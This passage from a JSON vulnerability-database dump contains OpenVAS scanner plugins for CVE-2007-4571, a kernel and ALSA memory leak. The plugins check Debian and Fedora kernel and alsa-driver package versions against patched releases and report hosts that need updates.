{\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-amd64\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-k7\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-vserver-686\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-vserver-k7\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-xen-686\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-xen-vserver-686\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-modules-2.6.18-5-xen-686\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-modules-2.6.18-5-xen-vserver-686\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xen-linux-system-2.6.18-5-xen-686\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xen-linux-system-2.6.18-5-xen-vserver-686\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-all-ia64\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-itanium\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-mckinley\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-itanium\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-mckinley\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-all-mips\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-qemu\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-r4k-ip22\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-r5k-ip32\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-sb1-bcm91250a\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-sb1a-bcm91480b\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-qemu\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-r4k-ip22\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-r5k-ip32\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-sb1-bcm91250a\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-sb1a-bcm91480b\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-all-mipsel\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-r3k-kn02\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-r4k-kn04\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-r5k-cobalt\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-r3k-kn02\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-r4k-kn04\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-r5k-cobalt\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-all-powerpc\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-powerpc\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-powerpc-miboot\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-powerpc-smp\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-powerpc64\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-prep\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-vserver-powerpc\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-vserver-powerpc64\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-powerpc\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-powerpc-miboot\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-powerpc-smp\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-powerpc64\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-prep\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-vserver-powerpc\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-vserver-powerpc64\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-all-s390\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-s390\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-s390x\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-vserver-s390x\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-s390\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-s390-tape\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-s390x\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-vserver-s390x\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-all-sparc\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-sparc32\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-sparc64\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-sparc64-smp\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.18-5-vserver-sparc64\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-sparc32\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-sparc64\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-sparc64-smp\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.18-5-vserver-sparc64\", ver:\"2.6.18.dfsg.1-13etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4571"], "description": "Check for the Version of kernel", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:861192", "href": "http://plugins.openvas.org/nasl.php?oid=861192", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2007-2349", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2007-2349\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"kernel on Fedora 7\";\ntag_insight = \"The kernel package contains the Linux kernel (vmlinuz), the core of any\n Linux operating system. The kernel handles the basic functions\n of the operating system: memory allocation, process allocation, device\n input and output, etc.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2007-September/msg00436.html\");\n script_id(861192);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 16:01:32 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2007-2349\");\n script_cve_id(\"CVE-2007-4571\");\n script_name( \"Fedora Update for kernel FEDORA-2007-2349\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC7\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.22.9~91.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.22.9~91.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.22.9~91.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.22.9~91.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.22.9~91.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.22.9~91.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.22.9~91.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.22.9~91.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.22.9~91.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.22.9~91.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.22.9~91.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.22.9~91.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.22.9~91.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.22.9~91.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.22.9~91.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-25T10:56:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4571"], "description": "Check for the Version of kernel", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:861149", "href": "http://plugins.openvas.org/nasl.php?oid=861149", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2007-714", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2007-714\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"kernel on Fedora Core 6\";\ntag_insight = \"The kernel package contains the Linux kernel (vmlinuz), the core of any\n Linux operating system. The kernel handles the basic functions\n of the operating system: memory allocation, process allocation, device\n input and output, etc.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2007-October/msg00083.html\");\n script_id(861149);\n script_version(\"$Revision: 6622 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 07:52:50 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 16:31:39 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2007-714\");\n script_cve_id(\"CVE-2007-4571\");\n script_name( \"Fedora Update for kernel FEDORA-2007-714\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora_core\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC6\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.22.9~61.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ppc/kernel-doc\", rpm:\"ppc/kernel-doc~2.6.22.9~61.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/debug/kernel-debuginfo\", rpm:\"x86_64/debug/kernel-debuginfo~2.6.22.9~61.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/kernel-debug-devel\", rpm:\"x86_64/kernel-debug-devel~2.6.22.9~61.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/debug/kernel-debuginfo-common\", rpm:\"x86_64/debug/kernel-debuginfo-common~2.6.22.9~61.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/kernel\", rpm:\"x86_64/kernel~2.6.22.9~61.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/kernel-debug\", rpm:\"x86_64/kernel-debug~2.6.22.9~61.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/debug/kernel-debug-debuginfo\", rpm:\"x86_64/debug/kernel-debug-debuginfo~2.6.22.9~61.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/kernel-devel\", rpm:\"x86_64/kernel-devel~2.6.22.9~61.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/kernel-headers\", rpm:\"x86_64/kernel-headers~2.6.22.9~61.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/kernel-doc\", rpm:\"x86_64/kernel-doc~2.6.22.9~61.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/kernel-headers\", rpm:\"i386/kernel-headers~2.6.22.9~61.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/debug/kernel-debuginfo-common\", rpm:\"i386/debug/kernel-debuginfo-common~2.6.22.9~61.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/kernel-devel\", rpm:\"i386/kernel-devel~2.6.22.9~61.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/kernel\", rpm:\"i386/kernel~2.6.22.9~61.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/debug/kernel-debuginfo\", rpm:\"i386/debug/kernel-debuginfo~2.6.22.9~61.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/kernel-doc\", rpm:\"i386/kernel-doc~2.6.22.9~61.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-24T12:49:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4571"], "description": "The remote host is missing an update to alsa-driver\nannounced via advisory DSA 1505-1.", "modified": "2017-07-07T00:00:00", "published": "2008-02-28T00:00:00", "id": "OPENVAS:60439", "href": "http://plugins.openvas.org/nasl.php?oid=60439", "type": "openvas", "title": "Debian Security Advisory DSA 1505-1 (alsa-driver)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1505_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1505-1 (alsa-driver)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Takashi Iwai supplied a fix for a memory leak in the snd_page_alloc module.\nLocal users could exploit this issue to obtain sensitive information from\nthe kernel (CVE-2007-4571).\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 1.0.13-5etch1. This issue was already fixed for the version\nof ALSA provided by linux-2.6 in DSA 1479.\n\nFor the oldstable distribution (sarge), this problem has been fixed in\nversion 1.0.8-7sarge1. The prebuilt modules provided by alsa-modules-i386\nhave been rebuilt to take advantage of this update, and are available in\nversion 1.0.8+2sarge2.\n\nFor the unstable distributions (sid), this problem was fixed in version\n1.0.15-1.\n\nWe recommend that you upgrade your alsa-driver and alsa-modules-i386\";\ntag_summary = \"The remote host is missing an update to alsa-driver\nannounced via advisory DSA 1505-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201505-1\";\n\n\nif(description)\n{\n script_id(60439);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-02-28 02:09:28 +0100 (Thu, 28 Feb 2008)\");\n script_cve_id(\"CVE-2007-4571\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Debian Security Advisory DSA 1505-1 (alsa-driver)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"alsa-headers\", ver:\"1.0.8-7sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsa-source\", ver:\"1.0.8-7sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsa-base\", ver:\"1.0.8-7sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = 